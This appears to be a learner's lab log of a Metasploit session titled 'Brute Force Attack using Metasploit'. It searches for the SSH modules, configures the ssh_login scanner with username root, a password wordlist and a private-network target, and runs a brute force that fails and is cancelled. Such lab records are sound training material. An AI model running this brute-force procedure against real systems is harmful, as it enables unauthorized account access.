Brute Force Attack using Metasploit - option 1 


┌──(kali㉿kali)-[~]
└─$ msfconsole 
Metasploit tip: Use check before run to confirm if a target is 
vulnerable
                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'



       =[ metasploit v6.4.116-dev                               ]
+ -- --=[ 2,623 exploits - 1,326 auxiliary - 1,710 payloads     ]
+ -- --=[ 432 post - 49 encoders - 14 nops - 10 evasion         ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

msf > search ssh

Matching Modules
================

   #    Name                                                               Disclosure Date  Rank       Check  Description
   -    ----                                                               ---------------  ----       -----  -----------
   0    exploit/linux/http/acronis_cyber_infra_cve_2023_45249              2024-07-24       excellent  Yes    Acronis Cyber Infrastructure default password remote code execution
   1      \_ target: Unix/Linux Command                                    .                .          .      .
   2      \_ target: Interactive SSH                                       .                .          .      .
   3    exploit/linux/http/alienvault_exec                                 2017-01-31       excellent  Yes    AlienVault OSSIM/USM Remote Code Execution
   4    auxiliary/scanner/ssh/apache_karaf_command_execution               2016-02-09       normal     No     Apache Karaf Default Credentials Command Execution
   5    auxiliary/scanner/ssh/karaf_login                                  .                normal     No     Apache Karaf Login Utility
   6    exploit/apple_ios/ssh/cydia_default_ssh                            2007-07-02       excellent  No     Apple iOS Default SSH Password Vulnerability
   7    exploit/unix/ssh/arista_tacplus_shell                              2020-02-02       great      Yes    Arista restricted shell escape (with privesc)
   8    exploit/unix/ssh/array_vxag_vapv_privkey_privesc                   2014-02-03       excellent  No     Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
   9    exploit/linux/ssh/ceragon_fibeair_known_privkey                    2015-04-01       excellent  No     Ceragon FibeAir IP-10 SSH Private Key Exposure
   10   auxiliary/scanner/ssh/cerberus_sftp_enumusers                      2014-05-27       normal     No     Cerberus FTP Server SFTP Username Enumeration
   11   auxiliary/dos/cisco/cisco_7937g_dos                                2020-06-02       normal     No     Cisco 7937G Denial-of-Service Attack
   12   auxiliary/admin/http/cisco_7937g_ssh_privesc                       2020-06-02       normal     No     Cisco 7937G SSH Privilege Escalation
   13   exploit/linux/http/cisco_asax_sfr_rce                              2022-06-22       excellent  Yes    Cisco ASA-X with FirePOWER Services Authenticated Command Injection
   14     \_ target: Shell Dropper                                         .                .          .      .
   15     \_ target: Linux Dropper                                         .                .          .      .
   16   auxiliary/scanner/http/cisco_firepower_login                       .                normal     No     Cisco Firepower Management Console 6.0 Login
   17   exploit/linux/ssh/cisco_ucs_scpuser                                2019-08-21       excellent  No     Cisco UCS Director default scpuser password
   18   exploit/linux/persistence/docker_image                             2013-03-20       excellent  Yes    Docker Image Persistence
   19   auxiliary/scanner/ssh/eaton_xpert_backdoor                         2018-07-18       normal     No     Eaton Xpert Meter SSH Private Key Exposure Scanner
   20   exploit/linux/ssh/ssh_erlangotp_rce                                2025-04-16       excellent  Yes    Erlang OTP Pre-Auth RCE Scanner and Exploit
   21     \_ target: Linux Command                                         .                .          .      .
   22     \_ target: Unix Command                                          .                .          .      .
   23   exploit/linux/ssh/exagrid_known_privkey                            2016-04-07       excellent  No     ExaGrid Known SSH Key and Default Password
   24   exploit/linux/ssh/f5_bigip_known_privkey                           2012-06-11       excellent  No     F5 BIG-IP SSH Private Key Exposure
   25   exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684   2022-10-10       excellent  Yes    Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.
   26   auxiliary/scanner/ssh/fortinet_backdoor                            2016-01-09       normal     No     Fortinet SSH Backdoor Scanner
   27   post/windows/manage/forward_pageant                                .                normal     No     Forward SSH Agent Requests To Remote Pageant
   28   exploit/windows/ssh/freeftpd_key_exchange                          2006-05-12       average    No     FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
   29     \_ target: Windows 2000 SP0-SP4 English                          .                .          .      .
   30     \_ target: Windows 2000 SP0-SP4 German                           .                .          .      .
   31     \_ target: Windows XP SP0-SP1 English                            .                .          .      .
   32     \_ target: Windows XP SP2 English                                .                .          .      .
   33   exploit/windows/ssh/freesshd_key_exchange                          2006-05-12       average    No     FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
   34     \_ target: Windows 2000 Pro SP4 English                          .                .          .      .
   35     \_ target: Windows XP Pro SP0 English                            .                .          .      .
   36     \_ target: Windows XP Pro SP1 English                            .                .          .      .
   37   exploit/windows/ssh/freesshd_authbypass                            2010-08-11       excellent  Yes    Freesshd Authentication Bypass
   38     \_ target: PowerShell                                            .                .          .      .
   39     \_ target: CmdStager upload                                      .                .          .      .
   40   auxiliary/scanner/http/gitlab_user_enum                            2014-11-21       normal     No     GitLab User Enumeration
   41   exploit/multi/http/gitlab_shell_exec                               2013-11-04       excellent  Yes    Gitlab-shell Code Execution
   42     \_ target: Linux                                                 .                .          .      .
   43     \_ target: Linux (x64)                                           .                .          .      .
   44     \_ target: Unix (CMD)                                            .                .          .      .
   45     \_ target: Python                                                .                .          .      .
   46   exploit/linux/ssh/ibm_drm_a3user                                   2020-04-21       excellent  No     IBM Data Risk Manager a3user Default Password
   47   post/windows/manage/install_ssh                                    .                normal     No     Install OpenSSH for Windows
   48   payload/generic/ssh/interact                                       .                normal     No     Interact with Established SSH Connection
   49   post/multi/gather/jenkins_gather                                   .                normal     No     Jenkins Credential Collector
   50   auxiliary/scanner/ssh/juniper_backdoor                             2015-12-20       normal     No     Juniper SSH Backdoor Scanner
   51   exploit/freebsd/http/junos_phprc_auto_prepend_file                 2023-08-17       excellent  Yes    Junos OS PHPRC Environment Variable Manipulation RCE
   52     \_ target: PHP In-Memory                                         .                .          .      .
   53     \_ target: Interactive SSH with jail break                       .                .          .      .
   54   auxiliary/scanner/ssh/detect_kippo                                 .                normal     No     Kippo SSH Honeypot Detector
   55   post/linux/gather/enum_network                                     .                normal     No     Linux Gather Network Information
   56   exploit/linux/local/ptrace_traceme_pkexec_helper                   2019-07-04       excellent  Yes    Linux Polkit pkexec helper PTRACE_TRACEME local root exploit
   57   exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey         2014-03-17       excellent  No     Loadbalancer.org Enterprise VA SSH Private Key Exposure
   58   exploit/multi/http/git_submodule_command_exec                      2017-08-10       excellent  No     Malicious Git HTTP Server For CVE-2017-1000117
   59   exploit/linux/ssh/mercurial_ssh_exec                               2017-04-18       excellent  No     Mercurial Custom hg-ssh Wrapper Remote Code Exec
   60   exploit/linux/ssh/microfocus_obr_shrboadmin                        2020-09-21       excellent  No     Micro Focus Operations Bridge Reporter shrboadmin default password
   61   post/multi/gather/ssh_creds                                        .                normal     No     Multi Gather OpenSSH PKI Credentials Collection
   62   payload/php/unix/cmd/reverse_ssh                                   .                normal     No     OS Command Exec, Unix Command Shell, Reverse TCP SSH
   63   exploit/solaris/ssh/pam_username_bof                               2020-10-20       normal     Yes    Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow
   64     \_ target: SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware      .                .          .      .
   65     \_ target: SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox  .                .          .      .
   66   auxiliary/gather/prometheus_api_gather                             2016-07-01       normal     No     Prometheus API Information Gather
   67   exploit/windows/ssh/putty_msg_debug                                2002-12-16       normal     No     PuTTY Buffer Overflow
   68     \_ target: Windows 2000 SP4 English                              .                .          .      .
   69     \_ target: Windows XP SP2 English                                .                .          .      .
   70     \_ target: Windows 2003 SP1 English                              .                .          .      .
   71   post/windows/gather/enum_putty_saved_sessions                      .                normal     No     PuTTY Saved Sessions Enumeration Module
   72   auxiliary/gather/qnap_lfi                                          2019-11-25       normal     Yes    QNAP QTS and Photo Station Local File Inclusion
   73   exploit/linux/ssh/quantum_dxi_known_privkey                        2014-03-17       excellent  No     Quantum DXi V1000 SSH Private Key Exposure
   74   exploit/linux/ssh/quantum_vmpro_backdoor                           2014-03-17       excellent  No     Quantum vmPRO Backdoor Command
   75   auxiliary/fuzzers/ssh/ssh_version_15                               .                normal     No     SSH 1.5 Version Fuzzer
   76   auxiliary/fuzzers/ssh/ssh_version_2                                .                normal     No     SSH 2.0 Version Fuzzer
   77   auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                          .                normal     No     SSH Key Exchange Init Corruption
   78   exploit/multi/persistence/ssh_key                                  1995-07-01       excellent  Yes    SSH Key Persistence
   79   auxiliary/scanner/ssh/ssh_login                                    .                normal     No     SSH Login Check Scanner
   80   auxiliary/scanner/ssh/ssh_identify_pubkeys                         .                normal     No     SSH Public Key Acceptance Scanner
   81   exploit/multi/ssh/sshexec                                          1999-01-01       manual     No     SSH User Code Execution
   82     \_ target: Linux Command                                         .                .          .      .
   83     \_ target: Linux x86                                             .                .          .      .
   84     \_ target: Linux x64                                             .                .          .      .
   85     \_ target: Linux armle                                           .                .          .      .
   86     \_ target: Linux mipsle                                          .                .          .      .
   87     \_ target: Linux mipsbe                                          .                .          .      .
   88     \_ target: Linux aarch64                                         .                .          .      .
   89     \_ target: OSX x86                                               .                .          .      .
   90     \_ target: OSX x64                                               .                .          .      .
   91     \_ target: BSD x86                                               .                .          .      .
   92     \_ target: BSD x64                                               .                .          .      .
   93     \_ target: Python                                                .                .          .      .
   94     \_ target: Unix Cmd                                              .                .          .      .
   95     \_ target: Interactive SSH                                       .                .          .      .
   96   auxiliary/scanner/ssh/ssh_enumusers                                .                normal     No     SSH Username Enumeration
   97     \_ action: Malformed Packet                                      .                .          .      Use a malformed packet
   98     \_ action: Timing Attack                                         .                .          .      Use a timing attack
   99   auxiliary/fuzzers/ssh/ssh_version_corrupt                          .                normal     No     SSH Version Corruption
   100  auxiliary/scanner/ssh/ssh_version                                  .                normal     No     SSH Version Scanner
   101  post/multi/gather/saltstack_salt                                   .                normal     No     SaltStack Salt Information Gatherer
   102  exploit/unix/http/schneider_electric_net55xx_encoder               2019-01-25       excellent  Yes    Schneider Electric Pelco Endura NET55XX Encoder
   103  exploit/windows/ssh/securecrt_ssh1                                 2002-07-23       average    No     SecureCRT SSH1 Buffer Overflow
   104  exploit/linux/ssh/solarwinds_lem_exec                              2017-03-17       excellent  No     SolarWinds LEM Default SSH Password Remote Code Execution
   105  exploit/linux/http/sourcegraph_gitserver_sshcmd                    2022-02-18       excellent  Yes    Sourcegraph gitserver sshCommand RCE
   106    \_ target: Automatic                                             .                .          .      .
   107    \_ target: Unix Command                                          .                .          .      .
   108    \_ target: Linux Dropper                                         .                .          .      .
   109  exploit/linux/ssh/symantec_smg_ssh                                 2012-08-27       excellent  No     Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability
   110  exploit/linux/http/symantec_messaging_gateway_exec                 2017-04-26       excellent  No     Symantec Messaging Gateway Remote Code Execution
   111  exploit/windows/ssh/sysax_ssh_username                             2012-02-27       normal     Yes    Sysax 5.53 SSH Username Buffer Overflow
   112    \_ target: Sysax 5.53 on Win XP SP3 / Win2k3 SP0                 .                .          .      .
   113    \_ target: Sysax 5.53 on Win2K3 SP1/SP2                          .                .          .      .
   114  auxiliary/dos/windows/ssh/sysax_sshd_kexchange                     2013-03-17       normal     No     Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
   115  exploit/unix/ssh/tectia_passwd_changereq                           2012-12-01       excellent  Yes    Tectia SSH USERAUTH Change Request Password Reset Vulnerability
   116  auxiliary/scanner/ssh/ssh_enum_git_keys                            .                normal     No     Test SSH Github Access
   117  exploit/linux/http/ubiquiti_airos_file_upload                      2016-02-13       excellent  No     Ubiquiti airOS Arbitrary File Upload
   118  payload/cmd/unix/reverse_ssh                                       .                normal     No     Unix Command Shell, Reverse TCP SSH
   119  payload/cmd/unix/bind_aws_instance_connect                         .                normal     No     Unix SSH Shell, Bind Instance Connect (via AWS API)
   120  exploit/linux/ssh/vmware_vrni_known_privkey                        2023-08-29       excellent  No     VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure
   121    \_ target: 6.0_platform                                          .                .          .      .
   122    \_ target: 6.0_proxy                                             .                .          .      .
   123    \_ target: 6.1_platform                                          .                .          .      .
   124    \_ target: 6.1_proxy                                             .                .          .      .
   125    \_ target: 6.2_collector                                         .                .          .      .
   126    \_ target: 6.2_platform                                          .                .          .      .
   127    \_ target: 6.3_collector                                         .                .          .      .
   128    \_ target: 6.3_platform                                          .                .          .      .
   129    \_ target: 6.4_collector                                         .                .          .      .
   130    \_ target: 6.4_platform                                          .                .          .      .
   131    \_ target: 6.5_collector                                         .                .          .      .
   132    \_ target: 6.5_platform                                          .                .          .      .
   133    \_ target: 6.6_collector                                         .                .          .      .
   134    \_ target: 6.6_platform                                          .                .          .      .
   135    \_ target: 6.7_collector                                         .                .          .      .
   136    \_ target: 6.7_platform                                          .                .          .      .
   137    \_ target: 6.8_collector                                         .                .          .      .
   138    \_ target: 6.8_platform                                          .                .          .      .
   139    \_ target: 6.9_collector                                         .                .          .      .
   140    \_ target: 6.9_platform                                          .                .          .      .
   141    \_ target: 6.10_collector                                        .                .          .      .
   142    \_ target: 6.10_platform                                         .                .          .      .
   143    \_ target: All                                                   .                .          .      .
   144  exploit/linux/ssh/vmware_vdp_known_privkey                         2016-12-20       excellent  No     VMware VDP Known SSH Key
   145  exploit/multi/http/vmware_vcenter_uploadova_rce                    2021-02-23       manual     Yes    VMware vCenter Server Unauthenticated OVA File Upload RCE
   146    \_ target: VMware vCenter Server <= 6.7 Update 1b (Linux)        .                .          .      .
   147    \_ target: VMware vCenter Server <= 6.7 Update 3j (Windows)      .                .          .      .
   148  exploit/linux/ssh/vyos_restricted_shell_privesc                    2018-11-05       great      Yes    VyOS restricted-shell Escape and Privilege Escalation
   149  post/windows/gather/credentials/whatsupgold_credential_dump        2022-11-22       manual     No     WhatsUp Gold Credentials Dump
   150    \_ action: Decrypt                                               .                .          .      Decrypt WhatsUp Gold database export CSV file
   151    \_ action: Dump                                                  .                .          .      Export WhatsUp Gold database and perform decryption
   152    \_ action: Export                                                .                .          .      Export WhatsUp Gold database without decryption
   153  post/windows/gather/credentials/mremote                            .                normal     No     Windows Gather mRemote Saved Password Extraction
   154  exploit/windows/local/unquoted_service_path                        2001-10-25       great      Yes    Windows Unquoted Service Path Privilege Escalation
   155  exploit/linux/http/zyxel_lfi_unauth_ssh_rce                        2022-02-01       excellent  Yes    Zyxel chained RCE using LFI and weak password derivation algorithm
   156    \_ target: Unix Command                                          .                .          .      .
   157    \_ target: Linux Dropper                                         .                .          .      .
   158    \_ target: Interactive SSH                                       .                .          .      .
   159  auxiliary/scanner/ssh/libssh_auth_bypass                           2018-10-16       normal     No     libssh Authentication Bypass Scanner
   160    \_ action: Execute                                               .                .          .      Execute a command
   161    \_ action: Shell                                                 .                .          .      Spawn a shell
   162  exploit/linux/http/php_imap_open_rce                               2018-10-23       good       Yes    php imap_open Remote Code Execution
   163    \_ target: prestashop                                            .                .          .      .
   164    \_ target: suitecrm                                              .                .          .      .
   165    \_ target: e107v2                                                .                .          .      .
   166    \_ target: Horde IMP H3                                          .                .          .      .
   167    \_ target: custom                                                .                .          .      .


Interact with a module by name or index. For example info 167, use 167 or use exploit/linux/http/php_imap_open_rce
After interacting with a module you can manually set a TARGET with set TARGET 'custom'

msf > use 79
msf auxiliary(scanner/ssh/ssh_login) > optins
[-] Unknown command: optins. Did you mean options? Run the help command for more details.
msf auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   CreateSession     true             no        Create a new session for every successful login
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   KEY_PASS                           no        Passphrase for SSH private key(s)
   KEY_PATH                           no        Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will
                                                be skipped. Duplicate private keys will be ignored.
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   PRIVATE_KEY                        no        The string value of the private key that will be used. If you are using MSFConsole, this value should be s
                                                et as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/ssh_login) > 
msf auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
pass_file => /usr/share/wordlists/metasploit/unix_passwords.txt
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.67
rhosts => 192.168.1.67
msf auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                              Required  Description
   ----              ---------------                              --------  -----------
   ANONYMOUS_LOGIN   false                                        yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false                                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                            yes       How fast to bruteforce, from 0 to 5
   CreateSession     true                                         no        Create a new session for every successful login
   DB_ALL_CREDS      false                                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                        no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                        no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                         no        Skip existing credentials stored in the current database (Accepted: none, user
                                                                            , user&realm)
   KEY_PASS                                                       no        Passphrase for SSH private key(s)
   KEY_PATH                                                       no        Filename or directory of cleartext private keys. Filenames beginning with a do
                                                                            t, or ending in ".pub" will be skipped. Duplicate private keys will be ignored
                                                                            .
   PASSWORD                                                       no        A specific password to authenticate with
   PASS_FILE         /usr/share/wordlists/metasploit/unix_passwo  no        File containing passwords, one per line
                     rds.txt
   PRIVATE_KEY                                                    no        The string value of the private key that will be used. If you are using MSFCon
                                                                            sole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, an
                                                                            d ECDSA private keys are supported.
   RHOSTS            192.168.1.67                                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                                                            cs/using-metasploit.html
   RPORT             22                                           yes       The target port
   STOP_ON_SUCCESS   false                                        yes       Stop guessing when a credential works for a host
   THREADS           1                                            yes       The number of concurrent threads (max one per host)
   USERNAME          root                                         no        A specific username to authenticate as
   USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                        no        Try the username as the password for all users
   USER_FILE                                                      no        File containing usernames, one per line
   VERBOSE           false                                        yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/ssh_login) > set threads 10
threads => 10
msf auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                              Required  Description
   ----              ---------------                              --------  -----------
   ANONYMOUS_LOGIN   false                                        yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false                                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                            yes       How fast to bruteforce, from 0 to 5
   CreateSession     true                                         no        Create a new session for every successful login
   DB_ALL_CREDS      false                                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                        no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                        no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                         no        Skip existing credentials stored in the current database (Accepted: none, user
                                                                            , user&realm)
   KEY_PASS                                                       no        Passphrase for SSH private key(s)
   KEY_PATH                                                       no        Filename or directory of cleartext private keys. Filenames beginning with a do
                                                                            t, or ending in ".pub" will be skipped. Duplicate private keys will be ignored
                                                                            .
   PASSWORD                                                       no        A specific password to authenticate with
   PASS_FILE         /usr/share/wordlists/metasploit/unix_passwo  no        File containing passwords, one per line
                     rds.txt
   PRIVATE_KEY                                                    no        The string value of the private key that will be used. If you are using MSFCon
                                                                            sole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, an
                                                                            d ECDSA private keys are supported.
   RHOSTS            192.168.1.67                                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                                                            cs/using-metasploit.html
   RPORT             22                                           yes       The target port
   STOP_ON_SUCCESS   false                                        yes       Stop guessing when a credential works for a host
   THREADS           10                                           yes       The number of concurrent threads (max one per host)
   USERNAME          root                                         no        A specific username to authenticate as
   USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                        no        Try the username as the password for all users
   USER_FILE                                                      no        File containing usernames, one per line
   VERBOSE           true                                         yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.1.67:22       - Starting bruteforce
[*] 192.168.1.67:22 SSH - Testing User/Pass combinations
[-] 192.168.1.67:22       - Failed: 'root:admin'
[!] No active DB -- Credential data will not be saved!
[-] 192.168.1.67:22       - Failed: 'root:123456'
[-] 192.168.1.67:22       - Failed: 'root:12345'
[-] 192.168.1.67:22       - Failed: 'root:123456789'
[-] 192.168.1.67:22       - Failed: 'root:password'
[-] 192.168.1.67:22       - Failed: 'root:iloveyou'
[-] 192.168.1.67:22       - Failed: 'root:princess'
[-] 192.168.1.67:22       - Failed: 'root:1234567'
[-] 192.168.1.67:22       - Failed: 'root:12345678'
[-] 192.168.1.67:22       - Failed: 'root:abc123'
[-] 192.168.1.67:22       - Failed: 'root:nicole'
[-] 192.168.1.67:22       - Failed: 'root:daniel'
[-] 192.168.1.67:22       - Failed: 'root:babygirl'
[-] 192.168.1.67:22       - Failed: 'root:monkey'
[-] 192.168.1.67:22       - Failed: 'root:lovely'
[-] 192.168.1.67:22       - Failed: 'root:jessica'
[-] 192.168.1.67:22       - Failed: 'root:654321'
[-] 192.168.1.67:22       - Failed: 'root:michael'
[-] 192.168.1.67:22       - Failed: 'root:ashley'
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed




NOTE: Cancelled because it took too long and couldn't find passwords